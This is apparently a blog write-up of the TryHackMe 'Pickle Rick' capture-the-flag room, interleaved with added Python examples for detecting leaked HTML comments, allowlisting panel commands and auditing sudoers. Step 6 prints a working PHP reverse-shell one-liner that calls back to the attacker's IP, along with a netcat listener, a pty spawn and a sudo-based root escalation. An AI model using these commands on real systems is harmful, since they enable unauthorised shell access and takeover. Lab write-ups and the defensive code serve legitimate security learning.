Pickle Rick — THM Writeup

Abdul Wassay (HotPlugin)
4 min read · Oct 14, 2021
[Image: Pickle Rick Room — THM]

Introduction:

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients (flags) that will help Rick make his potion to transform himself back into a human from a pickle.

Methodology:

As explained in the room introduction, this is a web-based room and we have to exploit the web server to find three flags (the ingredients, according to the theme). So we don’t need to do any network enumeration; our only focus will be the website.

1. So go ahead, spin up the machine and navigate to the website on the given IP address.

2. Whenever I do web enumeration, my first go-to is always inspecting the source code of the page (Ctrl+U) and navigating around the whole website. Viewing the source, we find a note mistakenly left by the developer which contains sensitive information (a username). We don’t yet know what this username is for, so we put it in our back pocket (notes) and continue our enumeration.
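The note found in step 2 is a classic case of a developer comment shipping to production. As an added example (not part of the original writeup), here is a small pre-deployment check in Python that pulls every HTML comment out of a page and flags the ones mentioning credential-like terms, so such a note is caught before the page goes live. The sample page, the keyword list and all names here are constructed for the example.

```python
"""Flag HTML comments that look like they leak credentials or developer notes.

Added example, not the room's code. The keyword list is an assumption;
extend it to fit the application being checked.
"""
import re
from html.parser import HTMLParser
from typing import List, Tuple

# Terms that make a comment worth a human look before deployment.
SENSITIVE_TERMS = re.compile(
    r"\b(user(?:name)?|password|passwd|pwd|login|token|api[-_ ]?key|secret|todo)\b",
    re.IGNORECASE,
)


class CommentCollector(HTMLParser):
    """Collects the text of every <!-- comment --> in the document."""

    def __init__(self) -> None:
        super().__init__()
        self.comments: List[str] = []

    def handle_comment(self, data: str) -> None:
        self.comments.append(data.strip())


def find_sensitive_comments(html: str) -> List[Tuple[str, str]]:
    """Return (matched_term, comment_text) for each comment that hits a sensitive term."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    hits: List[Tuple[str, str]] = []
    for comment in parser.comments:
        match = SENSITIVE_TERMS.search(comment)
        if match:
            hits.append((match.group(0).lower(), comment))
    return hits


# Constructed sample page: the second comment is the kind of note that should never ship.
SAMPLE_PAGE = """<!DOCTYPE html>
<html>
<head><title>Help Rick</title></head>
<body>
  <!-- Layout: two-column grid -->
  <h1>Help Rick</h1>
  <!-- Note to self: remove the test username before launch -->
  <p>Rick needs his ingredients.</p>
</body>
</html>
"""

if __name__ == "__main__":
    for term, text in find_sensitive_comments(SAMPLE_PAGE):
        print(f"[{term}] {text}")
```

Run it over the rendered templates (or crawl the staging site and feed each response body in) as a CI step; anything it reports is either removed or explicitly accepted by a reviewer.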

3. Continuing our enumeration, we have only a single webpage. So we need to enumerate hidden directories and pages that might be of interest. There are many tools for this task, like gobuster, dirb, dirbuster etc. You can use whatever you are comfortable with, but I’m going to use dirbuster because I find it easy and simple to use.

After a few minutes of scanning, we have found some directories. Of these, login.php, portal.php and robots.txt are very interesting to us.

4. Now we navigate to these pages one by one. First, upon navigating to robots.txt, we find some text. Since we don’t know what it is, we just keep it in our back pocket (notes) and move on.

Next, moving to the login page we found a portal.

Now, we don’t know the credentials. But checking our notes, we already have a username from the home page and a weird string from robots.txt. Using those findings as credentials, we successfully log in.

5. We can see there’s a command panel which lets us inject commands. But some commands are restricted; for example, we cannot read files.

6. Now, since we know PHP is running on the server, we can inject a PHP reverse shell to gain access. Here’s the one I got from the PayloadsAllTheThings repo.

php -r '$sock=fsockopen("<Your VPN IP>",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
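The reason the panel’s restriction does not hold is that it only blocks a few command names (a denylist) while still handing the raw string to a shell, so any interpreter that is not on the list runs unchanged. The defensive pattern is the reverse: map each permitted action to a fixed argv list, validate every argument against a strict pattern, and never invoke a shell. The following is an added example in Python, not the room’s PHP code; the set of allowed actions and the argument pattern are assumptions for the example.

```python
"""Allowlist-based command panel handler (added example, not the room's code).

Only the actions in ALLOWED_COMMANDS can run, arguments are checked against
a strict pattern, and subprocess is called without a shell, so input such
as 'php -r ...' or 'ls; cat file' is rejected before anything executes.
"""
import re
import shlex
import subprocess
from typing import Dict, List

# Assumption: these are the only actions the panel needs to expose.
ALLOWED_COMMANDS: Dict[str, List[str]] = {
    "ls": ["ls", "-l"],
    "whoami": ["whoami"],
    "uptime": ["uptime"],
}

# Arguments may only be plain relative names: no '/', no shell metacharacters,
# and no leading '-' so they cannot turn into options.
ARG_PATTERN = re.compile(r"^[A-Za-z0-9_.][A-Za-z0-9_.-]{0,63}$")
MAX_ARGS = 3


class RejectedCommand(ValueError):
    """Raised when the submitted text is not an allowlisted command."""


def build_argv(user_input: str) -> List[str]:
    """Turn panel text into a safe argv list, or raise RejectedCommand."""
    try:
        tokens = shlex.split(user_input)
    except ValueError as exc:  # unbalanced quotes and similar
        raise RejectedCommand(f"unparseable input: {exc}") from exc
    if not tokens:
        raise RejectedCommand("empty command")
    name, args = tokens[0], tokens[1:]
    if name not in ALLOWED_COMMANDS:
        raise RejectedCommand(f"command not allowed: {name!r}")
    if len(args) > MAX_ARGS:
        raise RejectedCommand("too many arguments")
    for arg in args:
        # '..' matches ARG_PATTERN, so it is excluded explicitly.
        if arg == ".." or not ARG_PATTERN.match(arg):
            raise RejectedCommand(f"argument not allowed: {arg!r}")
    return ALLOWED_COMMANDS[name] + args


def run_panel_command(user_input: str, timeout: float = 5.0) -> str:
    """Execute an allowlisted command with shell=False and return its stdout."""
    argv = build_argv(user_input)
    result = subprocess.run(
        argv, capture_output=True, text=True, timeout=timeout, check=False
    )
    return result.stdout


if __name__ == "__main__":
    for attempt in ["ls", "ls notes.txt", "php -r 'echo 1;'", "ls; cat secret"]:
        try:
            print(f"{attempt!r} -> {build_argv(attempt)}")
        except RejectedCommand as err:
            print(f"{attempt!r} -> rejected: {err}")
```

Because the decision is made on the parsed argv rather than on substrings of the raw text, there is nothing to "get around": an input either maps to one of the fixed argv lists or it is refused.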

But before executing this script, we need to set up a listener on our machine using netcat.

nc -nvlp 4444

[Image: NetCat Listener]

Now, after executing the above PHP script, we successfully get a shell.

But that’s not a pretty shell; we cannot autocomplete commands like in a normal shell. Since we know from the earlier command output that python3 is installed, we can easily spawn a TTY shell using the following python3 one-liner.

python3 -c 'import pty; pty.spawn("/bin/bash")'

7. Now we can read the first flag and the clue file. The second flag is in the /home/rick directory.

8. Now, for the last flag, we need to be root, hence escalate privileges. So first we check which commands we can run as the super user, using the sudo -l command.

We can see the result of the command. It says we can run all commands as the super user without any password. HUH!!!
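A rule of the form "(ALL) NOPASSWD: ALL" is the misconfiguration that hands over root in this step, and it is easy to catch in an audit. As an added example (not part of the writeup), here is a Python audit that reads rules in /etc/sudoers syntax, or the rule lines that sudo -l prints, and flags every entry granting ALL commands, ranking password-less ones highest. The sample rules below are constructed and do not reproduce the room’s sudoers file; the severity labels are an assumption of the example.

```python
"""Audit sudo rules for unrestricted (ALL) grants. Added example, not from the room."""
import re
from dataclasses import dataclass
from typing import List

# sudoers rule:  who  host=(runas) [TAG:] cmd1, cmd2
RULE_RE = re.compile(
    r"^\s*(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+?)\s*$"
)
# 'sudo -l' line:  (runas) [TAG:] cmd1, cmd2
SUDO_L_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+?)\s*$")
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


@dataclass
class Finding:
    who: str
    severity: str  # "critical" (no password) or "high" (password still required)
    reason: str
    rule: str


def _split_tags(spec: str):
    """Separate leading TAG: markers (NOPASSWD, SETENV, ...) from the command."""
    tags, cmd = set(), spec.strip()
    while ":" in cmd:
        tag, rest = cmd.split(":", 1)
        tag = tag.strip()
        if tag.isupper() and " " not in tag:  # looks like a sudoers tag
            tags.add(tag)
            cmd = rest.strip()
        else:
            break
    return tags, cmd


def audit_sudoers(lines: List[str]) -> List[Finding]:
    """Return a Finding for every rule that allows running ALL commands."""
    findings: List[Finding] = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        match = RULE_RE.match(line)
        who = match.group("who") if match else "<current user>"
        if not match:
            match = SUDO_L_RE.match(line)
        if not match:
            continue
        for spec in match.group("cmds").split(","):
            tags, cmd = _split_tags(spec)
            if cmd != "ALL":
                continue
            if "NOPASSWD" in tags:
                findings.append(Finding(who, "critical", "ALL commands without a password", line))
            else:
                findings.append(Finding(who, "high", "ALL commands (password required)", line))
    return findings


# Constructed sample; the last line is the shape of rule that gives away root.
SAMPLE_SUDOERS = [
    "# constructed sample, not the room's file",
    "Defaults env_reset",
    "root    ALL=(ALL:ALL) ALL",
    "%sudo   ALL=(ALL:ALL) ALL",
    "backup  ALL=(root) NOPASSWD: /usr/bin/rsync",
    "rick    ALL=(ALL) NOPASSWD: ALL",
]

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f.severity:8} {f.who:8} {f.reason}: {f.rule}")
```

Feed it the contents of /etc/sudoers and /etc/sudoers.d/* from configuration management, or the output of sudo -l collected by an agent; a "critical" finding for any account other than a deliberately chosen admin role is something to fix, since a web shell as that user becomes root with a single sudo.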

9. So we switch the user to root and find the last flag in the /root directory.

Conclusion:

That was FUN!!! It was a pretty basic room for beginner practice. First we enumerated the web application and found an information disclosure and a Remote Code Execution that led to a reverse shell. Then, due to a security misconfiguration, we easily got root.
